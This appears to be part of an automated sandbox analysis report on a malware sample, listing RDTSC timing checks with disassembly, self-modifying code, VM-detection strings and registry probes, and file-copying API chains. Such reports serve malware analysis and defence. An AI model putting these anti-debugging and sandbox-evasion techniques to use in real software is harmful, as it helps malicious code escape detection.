              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE15C second address: 7BE169 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BE169 second address: 7BE16E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBA5A second address: 7CBA60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBA60 second address: 7CBA66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CBBF4 second address: 7CBC10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCE88B69078h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E05F9 second address: 7E0601 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0601 second address: 7E0606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0606 second address: 7E060D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E060D second address: 7E0616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E0616 second address: 7E061A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1014 second address: 7E1018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1018 second address: 7E1049 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FCE8904C1C6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E1049 second address: 7E1067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69070h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a jnp 00007FCE88B6907Fh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E11BE second address: 7E11C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E11C2 second address: 7E11D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FCE88B69066h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnl 00007FCE88B69068h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E11D6 second address: 7E11E0 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCE8904C1BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2DBE second address: 7E2DFF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FCE88B69078h 0x00000008 jmp 00007FCE88B69077h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push edx 0x00000014 pop edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2DFF second address: 7E2E1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1C2h 0x00000007 jng 00007FCE8904C1B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2E1B second address: 7E2E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 ja 00007FCE88B69066h 0x0000000b jmp 00007FCE88B69078h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2E42 second address: 7E2E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2E48 second address: 7E2E4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2C48 second address: 7E2C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2C4E second address: 7E2C6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88B69075h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6D80 second address: 7E6D87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E6FAB second address: 7E6FAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E71B1 second address: 7E7215 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE8904C1C2h 0x00000008 jmp 00007FCE8904C1BCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 mov dword ptr [ebp+122D1AB1h], edi 0x00000018 push dword ptr [ebp+122DB645h] 0x0000001e push 00000000h 0x00000020 push esi 0x00000021 call 00007FCE8904C1B8h 0x00000026 pop esi 0x00000027 mov dword ptr [esp+04h], esi 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc esi 0x00000034 push esi 0x00000035 ret 0x00000036 pop esi 0x00000037 ret 0x00000038 push 9192C999h 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jmp 00007FCE8904C1C1h 0x00000045 push ecx 0x00000046 pop ecx 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E85D0 second address: 7E863F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B69079h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FCE88B69075h 0x00000011 jmp 00007FCE88B69074h 0x00000016 popad 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jmp 00007FCE88B69076h 0x00000020 push ecx 0x00000021 pop ecx 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 jnc 00007FCE88B69066h 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E863F second address: 7E864B instructions: 0x00000000 rdtsc 0x00000002 jp 00007FCE8904C1B6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E864B second address: 7E8665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FCE88B69071h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA595 second address: 7EA59B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA59B second address: 7EA5B4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCE88B69066h 0x00000008 jmp 00007FCE88B6906Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA5B4 second address: 7EA5C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCE8904C1BCh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7EA5C6 second address: 7EA5D7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCE88B69066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50601D5 second address: 5060234 instructions: 0x00000000 rdtsc 0x00000002 mov ah, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b jmp 00007FCE8904C1BEh 0x00000010 pushfd 0x00000011 jmp 00007FCE8904C1C2h 0x00000016 or ah, FFFFFFC8h 0x00000019 jmp 00007FCE8904C1BBh 0x0000001e popfd 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007FCE8904C1C6h 0x00000027 pop ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b mov bl, F4h 0x0000002d mov ax, CA35h 0x00000031 popad 0x00000032 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5060234 second address: 506023A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506023A second address: 506023E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 506023E second address: 5060242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50602C4 second address: 50602CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50602CA second address: 506038B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88B6906Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007FCE88B69074h 0x00000010 call 00007FCE88B69072h 0x00000015 pop esi 0x00000016 pop edi 0x00000017 jmp 00007FCE88B69070h 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FCE88B6906Eh 0x00000026 sub si, 9998h 0x0000002b jmp 00007FCE88B6906Bh 0x00000030 popfd 0x00000031 mov ch, 03h 0x00000033 popad 0x00000034 pop ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FCE88B6906Ch 0x0000003e and ax, C3F8h 0x00000043 jmp 00007FCE88B6906Bh 0x00000048 popfd 0x00000049 pushfd 0x0000004a jmp 00007FCE88B69078h 0x0000004f add cx, 9E58h 0x00000054 jmp 00007FCE88B6906Bh 0x00000059 popfd 0x0000005a popad 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEE1D second address: 6FEE47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8904C1BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FCE8904C1C2h 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEE47 second address: 6FEE4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEE4D second address: 6FEE6A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCE8904C1C9h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FEE6A second address: 6FEE6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 54F9C3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 54F904 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6F24D0 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 706A09 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 7843C3 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-27240
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-26058
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003118A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003118A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00313910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00313910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031E210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0031E210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00311269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00311269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00311250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00311250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00314B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00314B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00314B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00314B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003123A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003123A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00312390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_00312390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030DB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0030DB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0030DB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0030DB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031CBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0031CBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031DD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0031DD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0031D530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0031D530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003016B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_003016B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003016A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_003016A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00321BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00321BF0
              Source: file.exe, file.exe, 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2087381883.0000000001081000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2087381883.000000000100E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
